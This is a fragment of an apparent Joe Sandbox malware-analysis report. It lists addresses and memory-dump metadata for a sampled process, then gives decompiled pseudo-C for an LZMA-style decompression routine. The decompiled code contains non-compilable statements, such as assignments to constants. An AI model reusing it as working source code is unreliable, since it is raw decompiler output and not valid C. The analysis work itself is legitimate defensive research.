                                    0x00407333
                                    0x004075bd
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725b
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x00407390
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x0040738e
                                    0x004075c3
                                    0x004075c3
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x004075fa
                                    0x004075fa
                                    0x00000000
                                    0x004075fa
                                    0x00407447
                                    0x004074c7
                                    0x00407490

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
